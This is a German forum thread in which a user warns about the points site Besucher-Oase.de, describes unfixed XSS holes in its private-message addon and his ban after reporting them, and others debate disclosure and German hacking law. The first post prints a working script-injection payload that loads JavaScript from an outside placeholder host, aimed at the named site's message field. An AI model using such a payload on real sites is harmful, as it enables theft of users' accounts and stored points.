[Gelöst]Warnung vor Besucher-Oase.de

[Drakor]

Hallo,

nun, ich möchte hiermit alle Klammer ausdrücklich vor der dubiosen Loseseite: "Besucher-Oase.de" warnen, welche von einem User Namens SonneDeluxe betrieben wird.

Zwischen mir und ihm gab es folgenden Zwischenfall:

Ich hatte ein paar XSS-Lücken auf der Seite entdeckt (ein paar ist gut, die Seite war übersäht damit ) und habe sie ihm unverzüglich per PN gemeldet.
Nicht lange danach torkelte eine komplett in Kleinbuchstaben und ohne Interpunktion verfasste PN (die sehr kompetent wirkte xD) ein, die mir erklärte, er würde sich darum kümmern.
Etwa eine Woche später fragte ich nach(die Lücken wurden offensichtlich noch nicht geschlossen), ich argumentierte, dass es jedem User möglich sei, sämtliche Lose und den Account aller anderen User (einschließlich seinem Admin) durch diverse Lücken zu stehlen, ich schrieb ihm während eines Gespräches sogar einen einfachen Zweizeiler, der das Problem behoben hätte.
Die Antwort: Es würde demnächst ein FWX Update gemacht werden, das dann die Lücken wie er so dachte schließen würde. (Natürlich totaler Schwachsinn, die XSS-Lücken waren/sind in den Addons, am gefährlichsten die im PN-Addon).


Ich lag ihm daraufhin ab und an immer wieder auf den Ohren, ohne Reaktion. Zwischendrin informierte ich in meiner Verzweifelung sogar ein paar Usern, denen ich, auf Anfrage, erfolgreich einen solchen Loseklau demonstrieren konnte, ja ich schrieb sogar einmal die Co-Admine an. Immernoch ohne Gegenmaßnahme auf Lücken.
Ich weiß nicht, wieviele Wochen das ging, zumindest stellte ich Heute fest, dass diese Lücken "gutmütig" und mickrig behoben wurden. (Zur Information: Der intelligente Beheber ist hingegangen und hat " sowie ' maskiert)

Jeder Progger hier wird mir zustimmen, wenn ich sage, dass das einfach nur lächerlich ist und rein gar nichts behebt.
Nun, ich schrieb daraufhin eine sehr "fiese" PN, in der ich den Admin nochmals dazu aufforderte die Lücken zu schließen, seine User seien schließlich fahrlässig un Unkenntnis gelassen und immer in der Gefahr, bald keine Lose mehr zu besitzen.


Sodann kam eine Reaktion: Ich wurde gesperrt: "Verdacht auf Manipulation des Skriptes". Ebenfalls lächerlich, ich kann das Skript gar nicht manipulieren. Lieber Admin, ich kann es höchstens durch eigenen Code erweitern, doch ich habe NIEMALS deiner Seite damit geschadet.
Wenn ich es hätte wollen, würde die Seite wohl nicht mehr existieren.


Also meine Warnung: Haltet euch von solch inkompetenten und fahrlässigen Admins fern, nicht zuletzt auch von der Seite, wenn euch eure Lose lieb sind.


An den Admin,
ich werde hier ein Beispielskript veröffentlichen und dich endgültig dazu zwingen diese Lücken zu beheben, außerdem fordere ich sämtliche Lose von dir zurück, inklusive der in den Anteilen investierten! Ich werde andernfalls andere Wege einschlagen um diese Lose zurückzubekommen.

Achja, das Skriptbeispiel (für Pn's in diesem Fall):

Zitat:

</td>/tr><script src=http://deineurl.de/skript.js></script>

Gruß
Drakor

Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.

[frogger1978]

also ganz erlich, ich weiß nich wass du meinst. ich bin ja schon nen paar tage bei besucher-oase und ich hab bissher nichts in der sb oder per pn lesen können das die seite lücken/fehlerhaft ist. vielleicht tust du das auch mal für leihen schreiben die vom proggen nix ahnung haben!
in dem sinne gruss frosch

[Dacuser]

Er meint damit das man mittels einer PN wo man was bestimmrtes reinschreibt jeden User um seine Lose bringen kann.

[Pr3DaTh0r]

Ich würde gern den Wahrheitsgehalt der Aussage von Drakor nachvollziehen / prüfen können. Wenn die Anschuldigungen wahr sind , dann ist der Admin ganz schön dreist so mit einem "Gönner" der Seite umzuspringen.

Als Absoluter Laie auf dem Gebiet der Programmierung kann ich die Anschuldigungen nicht Nachvollziehen , hoffe aber das sich fähige Leute hierzu mal äussern ob das Script der Seite tatsächlich so Schrottig ist.

Selbst auf die Gefahr hin das es nur falscher Alarm ist , würde ich gerne meine Lose erstmal in Sicherheit bringen , dies wird aber durch die AZ-Grenze von 20 Millionen verhindert. Gibts denn da keinen "Klamm-TÜV" oder sowas ?

An Stelle des Admins hätt ich Drakor als Söldner engagiert um die Lücken wenigstens Erstmal schliessen zu lassen , anstatt direkt zu Sperren (Welches in meinen Augen die total falsche Art ist mit Usern umzugehen, Sperren sollte man nur bei Absolutem Fehlverhalten wie Spam , Beleidigung etc. aber doch nicht bei sowas)

Ich hoffe der Admin und sein Co äussern sich auch mal hierzu , am besten mit Screenshots damit man auch mal was "sieht" und es nicht zu Anschuldigung gegen Anschuldigung kommt.


PS: Wer Fehler findet darf sie behalten.

[gadon]

Normalerweise lese ich hier nur aber ich möchte in diesem Fall mal eine Ausnahme machen. Die Sicherheitslücken die Drakor entdeckt hat sind normalerweise jedem Programmierer bekannt bzw. sollten es sein.

Ich versuch es mal einfach zu erklären, XXS-Lücken bieten "Angreifern" die Möglichkeit schädlichen code auf die Webseite ein zu schleusen, in dem sie ihren "Schadcode" einfach in die Eingabefelder eingeben, zB. über Privatnachrichten, das ganze kann damit enden das Usernamen, Passwörter etc. ausgelesen werden.

http://de.wikipedia.org/wiki/Cross-Site_Scripting

[ukgumo]

Was soll ich zu den Vorwürfen sagen? Ich habe den Betreiber der Oase als Ref meiner damaligen Seite Klamm-Friends kennen gelernt. Die Oase gabs da noch gar nicht. Er war noch nicht einmal mein Ref sondern der meines Partners und hat sich an mich gewandt. Aus diesem Kontakt entstand eine Idee und letztendlich Sonees Oase. Die Oase entstand aus vollem Eifer und Energie und hat Hand und Fuss. Jeder der das Gegenteil behaupten will muss mir Rede und Antwort stehen. Admins sind auch nur Menschen mit Real-Live. Nur schade das einige mit so blödsinnigen Threads versuchen Seiten kaputt zu machen. Sonee und ich haben eins gemeinsam: Wir gestalten unsere Seiten nicht nach uns sondern wie Ihr sie wollt... Also lasst das fiese Gemecker!!!

[Dacuser]

Wenn so ist dann soll Sonne mal antworten ob der fehler nun behoben ist oder nicht. Weil das es funktioniert hatt ist eine Tatsache

[Pr3DaTh0r]

Zitat:

Zitat von gadon

Normalerweise lese ich hier nur aber ich möchte in diesem Fall mal eine Ausnahme machen. Die Sicherheitslücken die Drakor entdeckt hat sind normalerweise jedem Programmierer bekannt bzw. sollten es sein.

Ich versuch es mal einfach zu erklären, XXS-Lücken bieten "Angreifern" die Möglichkeit schädlichen code auf die Webseite ein zu schleusen, in dem sie ihren "Schadcode" einfach in die Eingabefelder eingeben, zB. über Privatnachrichten, das ganze kann damit enden das Usernamen, Passwörter etc. ausgelesen werden.

http://de.wikipedia.org/wiki/Cross-Site_Scripting

Danke für die Erklärung , mich würde jetzt Interessieren : Sind diese Lücken auf der Oase ebenfalls vorhanden ? Kann das bestätigt werden ?

[Dacuser]

Zitat:

Zitat von Pr3DaTh0r

Danke für die Erklärung , mich würde jetzt Interessieren : Sind diese Lücken auf der Oase ebenfalls vorhanden ? Kann das bestätigt werden ?

Wenn nichts gemacht wurde sind diese Lücken noch vorhanden.

[SoneeDeluxe]

Bleibt mal ganz ruhig ob sowas funktioniert oder nicht werden euch die jenigen schon erklären die vom FWX 2.3.6 ahnung haben,denn meine infos sind das dass FWX 2.3.6 sicher ist...

[Dacuser]

Zitat:

Zitat von SoneeDeluxe

Bleibt mal ganz ruhig ob sowas funktioniert oder nicht werden euch die jenigen schon erklären die vom FWX 2.3.6 ahnung haben,denn meine infos sind das dass FWX 2.3.6 sicher ist...

Drakor hatt es doch geteste, und es hatt funktioniert. Also würde ich jetzt mal den hintern hoch bekommen und den fehler beseitigen

[Drakor]

@Sonne: Ist schön dass du dich überhaupt meldest:
Der oder besser gesagt die Fehler haben absolut gar nichts mit dem FWX zu tun, sondern (teilweise)mit irgendwelchen Addons. Von daher kann jemand, der sich mit dem FWX auskennt, sooft beschwören, dass das neue FWX sicher ist, es wird keinerlei Auswirkungen haben.

@Pr3DaTh0r: Ich kann zu dem aktuellen Stand der Lücken keine qualifizierte Aussage abgeben, aber ca. 1h vor dem ersten Post waren sie eindeutig noch vorhanden, wie mein Pn-Postfach in der Oase belegen kann.

Desweitern ist Dacuser derjenige, der die Chance hatte sich mitanzusehen, wie einfach es sein konnte Lose anderer User zu stehlen.

Gruß
Drakor

Ps: @gadon: Danke für die Erklärung, aber du wirst erstaunt sein, dass es in der Klammwelt etwas anders ist, wenn es zu solchen Themen kommt. Ich habe eine Liste von mehreren Dutzend Seiten, bei denen es aus dem Stehgreif mindestens genauso gefährlich ist wie auf der Oase. Ich bin mir auch sicher, dass ich noch tausend andere finde, die immer und immer wieder dieselben Lücken haben.

Fakt ist, dass JEDE FWX-Seite, die entweder exakt dasselbe Pn-System und/oder dieselbe FWX-Version und/oder andere "gleiche" Addons hat, potenziell gefährdet ist. (Ich hab schon mit so manchen Webmastern gesprochen, die es behoben haben bzw. einmal sogar dabei waren es zu beheben ^^).

[ewin12000]

Zitat:

Zitat von Drakor

Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.

Wie kommt man auf die Idee, in Eingabefelder, die den Zweck der Übermittlung von Textnachrichten haben, Scriptcodes einzugeben? Ich will dir ja nichts unterstellen, aber ich denke die Mehrzahl der Internetuser würde auf die Idee nicht kommen.
Und jetzt kommen wir zum Punkt und zwar unabhängig ob das Script sicher (was ist im Internet sicher?) bzw. sicher genug ist.
Meiner Auffassung nach, verstößt du gegen § 263 STGB oder zumindest gegen §202a STGB.

[Pr3DaTh0r]

Zitat:

Zitat von ewin12000

Wie kommt man auf die Idee, in Eingabefelder, die den Zweck der Übermittlung von Textnachrichten haben, Scriptcodes einzugeben? Ich will dir ja nichts unterstellen, aber ich denke die Mehrzahl der Internetuser würde auf die Idee nicht kommen.
Und jetzt kommen wir zum Punkt und zwar unabhängig ob das Script sicher (was ist im Internet sicher?) bzw. sicher genug ist.
Meiner Auffassung nach, verstößt du gegen § 263 STGB oder zumindest gegen §202 STGB.

Zu § 263 : Vermögensschaden ensteht nicht, da Er "nur" Klammlose damit klauen könnte. Und die haben , wie Wir alle wissen , keinen realen Gegenwert.

Zu § 202 : Er öffnet keine Briefe oder Ähnliches geschweige denn liest Er Teile des Scripts aus die codiert wären.

Bitte lasst die Paragrafenreiterei doch stecken , es gibt eh keine Instanz die zum derzeitigen Stand der Dinge ein Verfahren eröffnen würde. Seht lieber GEMEINSAM zu das die Klammwelt sicherer wird.

[Drakor]

Hallo ewin12000,

Nun, du zitierst einen Abschnitt des sogenannten Hackerparagraphen. Ich bin kein Jurist, aber ich kenne die Vergangenheit dieses Parapraphen, denn als er angewandt wurde gab es eine reihe von Selbstanzeigen von Datenschutzfirmen, oder Antivirenfirmen oder sogar (jetzt als Beispiel) vom ct-Chrefredakteur.

Wenn du es wünschst, kann ich mich natürlich ebenfalls selbst anzeigen, ich bin mir jedoch sicher, dass das Verfahren aus folgenden Gründen eingestellt wird:

- Einerseits Einstellung wegen Geringfügigkeit
- Andererseits Einstellung aufgrund der Tatsache, dass in der Vergangenheit ähnliche Fälle als nicht mit der Intention zum Computerbetrug/Daten ausspähen abgestempelt wurden.

Außerdem, ich bin ja auch zufällig darauf gestoßen und ich war es, der hingegangen ist und diesen Fehler gemeldet hat, ich habe darauf hin ja schließlich auch nichts weiter getan, außer auch auf Anfrage die Unsicherheit zu demonstrieren um zu soetwas verhindern.

Somit habe ich keine der für die Paragraphen notwendigen Intentionen erfüllt.

Andere Frage: Was wäre wenn niemand es melden/öffentlich machen würde ? Genau, es gäbe keine Loseseiten, da alle ausgeraubt worden wären und das nahezu perfekt und ohne Spuren und genau, es gäbe auch keine Antivirenfirmen, weil der Computer längst zugrunde gegangen wäre, da es zwar die Viren gibt, aber niemand (laut dem Gesetz) etwas dagegen machen darf.

Von daher möchte ich meine Aussage von oben nicht ändern =)

Gruß
Drakor

EDIT: Da war jemand schneller, aber Danke für die Paragraphen, auch wenn man die relativ schnell nachschauen kann.